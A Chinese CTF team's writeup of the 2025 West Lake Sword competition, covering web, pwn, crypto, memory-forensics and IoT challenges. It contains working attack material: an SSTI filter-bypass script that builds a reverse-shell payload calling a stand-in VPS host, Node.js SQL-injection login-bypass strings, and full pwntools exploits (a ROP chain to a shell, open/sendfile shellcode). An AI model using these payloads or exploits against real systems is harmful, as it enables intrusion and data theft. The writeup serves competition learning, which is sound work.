2025 西湖论剑 Writeup

admin, 2025-01-20 08:43:55

Web

Rank-l

SSTI (template injection)

On opening the challenge, the user-input field is where the SSTI fires, and the password field is where the template is parsed and executed.

We first threw the usual file-reading payload at it and found that /flag could not be read, so we tried reading app.py instead: the error message confirmed the filename, and then we read the source code.

The source reveals the blacklist used by this challenge:

```python
['eval', 'exec', 'os', 'system', 'import', '__import__', 'flag', '?', '*', '-', 'less', 'nl', 'tac', 'more', 'tail', 'od', 'grep', 'awd', 'sed', '64', '/', '%2f', '%2F']
```

Just feed it to fenjing.

```python
from fenjing import exec_cmd_payload
import logging

logging.basicConfig(level=logging.WARNING)

def waf(s: str):
    # Blacklist copied from the challenge's app.py; fenjing uses this
    # function to decide which candidate payloads are acceptable
    blacklist = ['eval', 'exec', 'os', 'system', 'import', '__import__', 'flag', '?', '*', '-',
                 'less', 'nl', 'tac', 'more', 'tail', 'od', 'grep', 'awd', 'sed', '64', '/',
                 '%2f', '%2F']
    for word in blacklist:
        if word in s:
            return False
    return True

# The first payload (a connectivity check) is overwritten by the reverse-shell one
payload, _ = exec_cmd_payload(waf, "curl vps:3333")
payload, _ = exec_cmd_payload(waf, "bash -c 'bash -i >& /dev/tcp/vps/3333 0>&1'")
print(payload)
```

The generated payload is:

```
{{((g.pop.__globals__.__builtins__['__i''mport__']("\x6f\x73").popen((('%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c')%(98,97,115,104,32,45,99,32,39,98,97,115,104,32,45,105,32,62,38,32,47,100,101,118,47,116,99,112,47,49,50,49,46,51,55,46,49,53,50,46,49,48,56,47,51,51,51,51,32,48,62,38,49,39)))).read())}}
```

Listen on the VPS, catch the reverse shell, and read the flag.
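The blacklist above and Jinja2's sandbox side by side, as an added example that is not part of the original writeup: the substring check lets a payload of the same shape through, while `SandboxedEnvironment` refuses the `__globals__` hop it depends on. `FakeG` standing in for flask.g is an assumption, and jinja2 must be installed.

```python
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Blacklist as recovered from the challenge's app.py.
BLACKLIST = ['eval', 'exec', 'os', 'system', 'import', '__import__', 'flag', '?', '*', '-',
             'less', 'nl', 'tac', 'more', 'tail', 'od', 'grep', 'awd', 'sed', '64', '/',
             '%2f', '%2F']

# Same shape as the writeup's payload, but the command is a harmless "id" built from
# %c codes: '\x6f\x73' decodes to "os" and '__i''mport__' joins to "__import__",
# so no blacklisted token appears literally in the submitted string.
OBFUSCATED = ("{{ g.pop.__globals__.__builtins__['__i''mport__']('\\x6f\\x73')"
              ".popen('%c%c' % (105, 100)).read() }}")

class FakeG:
    """Stand-in for flask.g (an assumption): any object with a Python-defined method works."""
    def pop(self, name, default=None):
        return default

def waf(s: str) -> bool:
    """The challenge's check: True means the input is allowed through."""
    return not any(word in s for word in BLACKLIST)

def normalize_jinja_literals(template: str) -> str:
    """Crude view of what Jinja2 sees: decode \\xNN escapes and join adjacent quoted
    literals. Matching after this step catches the two tricks above, but not the
    %c arithmetic, which is why a sandbox rather than a blacklist is the real fix."""
    decoded = template.encode('ascii', 'backslashreplace').decode('unicode-escape')
    return decoded.replace("''", "")

def sandbox_blocks(template: str) -> bool:
    """Render in Jinja2's SandboxedEnvironment; True if it refused with SecurityError.
    The sandbox treats any attribute starting with '_' (here __globals__) as unsafe."""
    env = SandboxedEnvironment()
    try:
        env.from_string(template).render(g=FakeG())
    except SecurityError:
        return True
    return False

if __name__ == "__main__":
    print("blacklist allows payload:", waf(OBFUSCATED))          # True
    print("normalized view:", normalize_jinja_literals(OBFUSCATED))
    print("sandbox blocks payload:", sandbox_blocks(OBFUSCATED))  # True
```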


sqli or not

Key point: Node.js quirks

```javascript
var express = require('express');
var router = express.Router();
module.exports = router;

router.get('/', (req, res, next) => {
    if (req.query.info) {
        if (req.url.match(/,/ig)) {
            res.end('hacker1!'); // Layer 1: commas are rejected; bypassed by splitting the parameter (variable concatenation)
        }
        var info = JSON.parse(req.query.info);
        if (info.username && info.password) {
            var username = info.username;
            var password = info.password;
            if (info.username.match(/'|"|\\/) || info.password.match(/'|"|\\/)) {
                res.end('hacker2!');
            }
            // Layer 2: the replace() calls below are what make the universal-password injection possible
            var sql = "select * from userinfo where username = '{username}' and password = '{password}'";
            sql = sql.replace("{username}", username);
            sql = sql.replace("{password}", password);
            // connection is the MySQL connection created elsewhere in the challenge
            connection.query(sql, function (err, rs) {
                if (err) {
                    res.end('error1');
                } else {
                    if (rs.length > 0) {
                        res.sendFile('/flag');
                    } else {
                        res.end('username or password error');
                    }
                }
            });
        } else {
            res.end("please input the data");
        }
    } else {
        res.end("please input the data");
    }
});
```

The payload is constructed as follows:

```
?info={"username":"11111"&info="password":"123"}
```

Reference: https://sakurahack-y.github.io/2022/11/20/NodeJs%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/

Next, close the SQL string and bypass the second layer: the `$\`` replacement pattern stands in for the single quote, so the select condition is satisfied and res.sendFile('/flag') fires, reading the flag.

Principle reference:

https://www.w3school.com.cn/jsref/jsref_replace.asp


The universal password is constructed as follows:

```
// Parameter passed: a%20$`||2--+  $`||2--+
select * from userinfo where username = '$`||2--+// ' and password = '{password}'
/?info={"username":"$`||2--+"&info="password":"123"
/?info={"username":"$`||2--+"&info="password":"$`+or+1%3d1%20"}
```


Pwn

VPWN

Vulnerability:


When an element is created, its data is stored on the stack, but it is placed below the element array.

So creating just 7 elements is enough to reach count; overwriting count with a very large value lets the edit function write all the way to the saved return address.

Use the show function to leak libc, then build the ROP chain.

Exploit:

```python
from pwn import *
import struct

context.log_level = "debug"
context.terminal = ["wt.exe", "wsl"]

def get_p(file):
    elf = ELF(file)
    # p = elf.process()
    p = remote("139.155.126.78", 30798)
    return p, elf

def debug():
    pause()
    gdb.attach(p)
    sleep(2)

p, elf = get_p("./pwn")
libc = ELF("/home/kamome/tools/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6")

# Menu wrappers: 1 = edit, 2 = push, 3 = free, 4 = show
def edit(idx, content):
    p.sendlineafter(b"Enter your choice: ", b"1")
    p.sendlineafter(b"Enter the index to edit (0-based): ", str(idx).encode())
    p.sendlineafter(b"Enter the new value: ", str(content).encode())

def add(content):
    p.sendlineafter(b"Enter your choice: ", b"2")
    p.sendlineafter(b"Enter the value to push: ", content)

def free(idx):
    p.sendlineafter(b"Enter your choice: ", b"3")

def show():
    p.sendlineafter(b"Enter your choice: ", b"4")

# The 7th push lands on count, so later edits can index far past the array
for _ in range(7):
    add(b"123")

# show() now dumps past the array; fields 18/19 hold a libc pointer split into two 32-bit values
show()
p.recvuntil(b"StackVector contents: ")
# sleep(2)
address = p.recvuntil(b"\n").decode()
log.success("addr = " + address)
address = address.split(" ")
libc_base = int(address[19])
libc_part1 = u32(struct.pack("i", int(address[18])))
libc.address = ((libc_base << 32) + libc_part1) - 0x29d90
log.success("addr = " + hex(libc.address))

pop_rdi = libc.address + 0x000000000002a3e5
ret = libc.address + 0x0000000000029139
system_addr = libc.sym["system"]
binsh_addr = next(libc.search(b"/bin/sh"))

# Each 64-bit ROP entry is written as two 32-bit slots: low half, then high half
edit(18, pop_rdi & 0xffffffff)
edit(19, pop_rdi >> 32)
edit(20, binsh_addr & 0xffffffff)
edit(21, binsh_addr >> 32)
edit(22, ret & 0xffffffff)
edit(23, ret >> 32)
edit(24, system_addr & 0xffffffff)
edit(25, system_addr >> 32)

# Choice 5 leaves the menu so the function returns into the chain
p.sendlineafter(b"Enter your choice: ", b"5")
# debug()
p.interactive()
```

Heaven's door

Vulnerability:


The shellcode you input is executed directly.

At most two syscalls are allowed.


A sandbox is enabled. It looks like a whitelist, but no restriction is placed on syscall numbers outside the whitelist, so any syscall can be executed. Oddly, execve("/bin/sh",0,0) produced no response.


We then found a shellcode online that completes the ORW in just two syscalls.


Running it yields the flag.

Exploit:

```python
from pwn import *

context.arch = "amd64"
context.log_level = "debug"
context.terminal = ["wt.exe", "wsl"]

elf = ELF("./pwn")
p = elf.process()
# p = remote("139.155.126.78", 23360)

def debug():
    gdb.attach(p)
    pause()

# Two syscalls only: open("flag") then sendfile(1, fd, 0, 0x100)
shellcode = asm("""
    push 0x67616c66      /* push "flag" plus NUL padding (0x67616c66 is "flag" little-endian) */
    push 2
    pop rax              /* SYS_open */
    mov rdi, rsp         /* path = "flag" on the stack */
    xor esi, esi         /* O_RDONLY */
    cdq                  /* rdx = 0 */
    syscall
    /* call sendfile(1, fd in rax, 0, 0x100) */
    mov r10d, 0x100
    mov rsi, rax
    push 40              /* sendfile syscall number 0x28 */
    pop rax
    push 1
    pop rdi              /* out_fd = stdout */
    cdq                  /* offset = 0 */
    syscall
""")

p.recvuntil(b"\n")
sleep(0.2)
p.send(shellcode)
p.interactive()
```

Cry

matrixRSA

This is clearly a known-high-bits attack. We tried Boneh-Durfee first without success, then found a related article: https://www.ruanx.net/coppersmith/

The conditions looked similar; after some adjustment we arrived at this code:

```sage
from Crypto.Util.number import inverse, long_to_bytes

# Known high bits of p (ph) and the modulus n, both from the challenge
ph = int(12305755811288164655681709252717258015229295989302934566212712319314835335461946241491177972870130171728224502716603340551353785064416812665744581355110400)
n = 132298777672085547096511087266255066285502135020124093900452138262993155381766816424955849796168059204379325075568094431259877923353664926875986223020472585645919414821322880213299188157427622804140996898685564075484754918339670099806186873974594139182324884620018780943630196754736972805036038798946726414009

# Coppersmith: recover the unknown low bits x of p = ph + x
R.<x> = Zmod(n)[]
f = ph + x
pl = ZZ(f.small_roots(X=2**100, beta=0.4)[0])
p = pl + ph
q = n // p
assert p * q == n

# Order used for 3x3 matrices over Z/nZ: p(p-1)(p+1)(p^2+p+1) for each prime
# (the q factor is q**2+q+1; the original listing had a typo here)
phi = p*(p-1)*(p+1)*(p**2+p+1)*q*(q-1)*(q+1)*(q**2+q+1)
e = 65537
d = inverse(e, phi)
print(d)

# Ciphertext matrix from the challenge
C = [[130700952989014311434434028098810412089294728270156705618326733322297465714495704072159530618655340096705383710304658044991149662060657745933090473082775425812641300964472543605460360640675949447837208449794830578184968528547366608180085787382376536622136035364815331037493098283462540849880674541138443271941,
      71108771421281691064141020659106224750236412635914570166893031318860027728093402453305986361330527563506168063047627979831630830003190075818824767924892107148560048725155587353683119195901991465464478196049173060097561821877061015587704803006499153902855903286456023726638247758665778434728734461065079337757,
      67999998657112350704927993584783146575182096185020115836188544590466205688442741039622382576899587857972463337900200038021257164640987281308471100297698062626107380871262596623736773815445544153508352926374272336154553916204320257697068627063236060520725376727528604938949588845448940836430120015498687885615],
     [23893343854815011808020457237095285782125931083991537368666368653089096539223297567339111502968295914745423286070638369517207554770793304994639155083818859208362057394004419565231389473766857235749279110546079776040193183912062870294579472815588333047561915280189529367474392709554971446978468118280633281993,
      9711323829269829751519177755915164402658693668631868499383945203627197171508441332211907278473276713066275283973856513580205808517918096017699122954464305556795300874005627001464297760413897074044080665941802588680926430030715299713241442313300920463145903399054123967914968894345491958980945927764454159601,
      44904507975955275578858125671789564568591470104141872573541481508697254621798834910263012676346204850278744732796211742615531019931085695420000582627144871996018850098958417750918177991375489106531511894991744745328626887250694950153424439172667977623425955725695498585224383607063387876414273539268016177401],
     [67805732998935098446255672500407441801838056284635701147853683333480924477835278030145327818330916280792499177503535618310624546400536573924729837478349680007368781306805363621196573313903080315513952415535369016620873765493531188596985587834408434835281527678166509365418905214174034794683785063802543354572,
      13486048723056269216825615499052563411132892702727634833280269923882908676944418624902325737619945647093190397919828623788245644333036340084254490542292357044974139884304715033710988658109160936809398722070125690919829906642273377982021120160702344103998315875166038849942426382506293976662337161520494820727,
      95932690738697024519546289135992512776877884741458439242887603021792409575448192508456813215486904392440772808083658410285088451086298418303987628634150431725794904656250453314950126433260613949819432633322599879072805834951478466009343397728711205498602927752917834774516505262381463414617797291857077444676]]

# Decryption exponent as printed above (pasted back in by hand, see the note below)
d = int("40230916883870975295417572445649759339852136874541002176973752451527591240861096967430489803821942773799391815661674299963553292463650235263727969014389785777665819655007474882298098229878813311376932399465744538646034939720955659019308738679692623129926990697777836666307149347750450442780453381039250373602002593874209103388231487190907175328166162564877943935162710248286756573517334543023648858684936469981950047976510851487311086482340081683345123544331772948394919719283886206697667295063758577599450894563047427201824896559559485062700718420451540502835234512267558960664547262336244031453163856153728029624773176461848238206859021866605114137013408588494942293135134906092831348276057200186924147295801417144669512448970855617474869961151344573825732071548725870642959331210768078570265383975425236335097212652349996163122356597824509934432776876686173173154415327059863598313156919579830449191858076215165247448201508850279235562403361368606784672551045482343305733351227204416686409931509634146371694652412878430940695410618258129138788972089438119159209182576"
        "340508750689247634560875279231143285461186459647253220477687677492972526262668202807605901607404051474350710537111564197493331201627573479606786507013716251563465866742020446763795046530618656040799998883423817653707626400175314432500297435031606092421804621920751473201072723348373087501316847682521422876803695814440009083463512010180408136488438161651707355829976671077902441340621658291647045248288911061239698672287968916239609863189634395069604688328431093595607041")

C = matrix(Zmod(n), C)
M = C^d
for i in M:
    for j in i:
        print(long_to_bytes(int(j)).decode(), end='')
```

Sage's handling of the data structures was messy, so some numbers had to be filled in by hand.
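Why phi above has the shape p(p-1)(p+1)(p²+p+1)·q(q-1)(q+1)(q²+q+1): an added check on toy primes, not code from the writeup. The primes, e and the matrix M are constructed; the decryption exponent is derived exactly as the Sage script derives it.

```python
# Every invertible 3x3 matrix over F_p satisfies M^L = I with
# L = p(p-1)(p+1)(p^2+p+1), the exponent of GL_3(F_p), so
# d = e^-1 mod (L_p * L_q) inverts C = M^e mod n for n = p*q.

def mat_mul(A, B, n):
    """Product of two 3x3 matrices with entries reduced modulo n."""
    return [[sum(A[i][k] * B[k][j] for k in range(3)) % n for j in range(3)]
            for i in range(3)]

def mat_pow(M, exp, n):
    """Square-and-multiply exponentiation of a 3x3 matrix modulo n."""
    R = [[int(i == j) for j in range(3)] for i in range(3)]  # identity
    while exp:
        if exp & 1:
            R = mat_mul(R, M, n)
        M = mat_mul(M, M, n)
        exp >>= 1
    return R

def gl3_exponent(p):
    """Exponent of GL_3(F_p) = p * lcm(p-1, p^2-1, p^3-1). This is the per-prime
    factor of the script's phi; the q side must read q**2 + q + 1."""
    return p * (p - 1) * (p + 1) * (p * p + p + 1)

def matrix_rsa_roundtrip(p, q, e, M):
    """Encrypt M as C = M^e mod n, decrypt with d = e^-1 mod L, return the result."""
    n = p * q
    L = gl3_exponent(p) * gl3_exponent(q)
    d = pow(e, -1, L)          # modular inverse (Python 3.8+)
    C = mat_pow(M, e, n)
    return mat_pow(C, d, n)

if __name__ == "__main__":
    # Constructed toy parameters: det(M) = 1, so M is invertible modulo anything.
    M = [[1, 2, 3], [0, 1, 4], [5, 6, 0]]
    print(matrix_rsa_roundtrip(1009, 1013, 65537, M) == M)   # True
```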

DS

easyrawencode

  1. Run Volatility 2 against the memory image; a filescan finds three suspicious files.

Export them. Given the challenge name we guessed these are the flag files. Looking at hack.py shows it needs the hackkey stored in the system environment, plus nonce, tag and enc_aes_key.


Use Volatility 2's envars plugin to get the value of hackkey.


Use Volatility 2's consoles plugin to recover the arguments of commands that were run earlier.


That gives us hackkey, nonce, tag and enc_aes_key; a quick round with ChatGPT produced a decryption script.

```python
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA

# Decrypt the RSA-encrypted AES key with the recovered private key
with open('private.pem', 'r') as f:
    private_key = RSA.import_key(f.read())

# Values needed (all recovered from the memory image):
#   enc_aes_key    - the RSA-encrypted AES key (hex -> bytes)
#   nonce          - the AES nonce (hex -> bytes)
#   tag            - the authentication tag of the AEAD mode (EAX here)
#   encrypted_data - the ciphertext, read from encrypted_data.bin

# Paste the values produced by the encryption script
enc_aes_key = bytes.fromhex("...")  # hex string not preserved on the page
nonce = bytes.fromhex("d919c229aab6535efa09a52c589c8f47")
tag = bytes.fromhex("5b204675b1b173c32c04b0b8a100ee29")

cipher_rsa = PKCS1_OAEP.new(private_key)
aes_key = cipher_rsa.decrypt(enc_aes_key)

# Read the AES-encrypted data
with open('encrypted_data.bin', 'rb') as f:
    encrypted_data = f.read()

# Initialise the AES decryptor with the recovered key and nonce
cipher_aes = AES.new(aes_key, AES.MODE_EAX, nonce=nonce)

# Verify the tag and decrypt; only write the output if verification passed
try:
    decrypted_data = cipher_aes.decrypt_and_verify(encrypted_data, tag)
    print("Decryption successful! ✅")
    print(decrypted_data.decode('utf-8'))  # if the plaintext is text
    with open('decrypted_data.csv', 'wb') as f:
        f.write(decrypted_data)
except ValueError as e:
    print("Decryption failed! ❌")
    print(f"Error: {str(e)}")
```
  2. Running it produces the decrypted data.csv. Seeing the password column and the encrypted personal-signature column, we guessed some cipher keyed by the password; after a few tries it turned out to be RC4.

A short script decrypts them in bulk:

```python
import csv
from Crypto.Cipher import ARC4
import base64

def rc4_decrypt(data, key1):
    """Base64-decode the ciphertext and RC4-decrypt it with the row's password as key."""
    data = base64.b64decode(data)
    key = bytes(key1, encoding='utf-8')
    enc = ARC4.new(key)
    res = enc.decrypt(data)
    res = str(res, 'utf-8')
    return res

if __name__ == "__main__":
    with open("decrypted_data.csv", encoding="utf-8") as f:
        csv_reader = csv.reader(f)
        for row in csv_reader:
            try:
                encrypt_data = row[6]  # encrypted signature column
                key = row[2]           # password column
                print('解密后:', rc4_decrypt(encrypt_data, key))
            except Exception:
                pass  # header row and rows that do not decrypt cleanly
```

Run it to get the flag.


Screenshot of the obtained flag

IOT

blink


Extract the firmware with binwalk; at offset 0x3010 there is a /dev/uart/0.


Skimming the output of strings shows the string rtosandmorseisveryeasyhahhaha.


Combined with the challenge hint, we guessed this is the flag; it was accepted.

sharkp


Download the attachment and start with the output2 capture; in TCP stream 157 we found the request shown below.


From this we determine it is an RCE. In TCP stream 190 the ELF file is visible; export it and analyze the shellcode value it contains.


Export it and set up a qiling environment to emulate it.

Setup reference: https://blog.csdn.net/freeking101/article/details/128522901

If you installed via pip, you also need to download the rootfs and extract it yourself, then point the path at the extracted directory when emulating. Once installed, run the emulation.


```
setSystemAdmin_115.195.88.161

ssetSystemAdmin_ 115.195.88.161

ha
```

This finally gives the flag.

Originally published by the WeChat public account ACT Team: 2025 西湖论剑 Writeup

Source: https://cn-sec.com/archives/3648102.html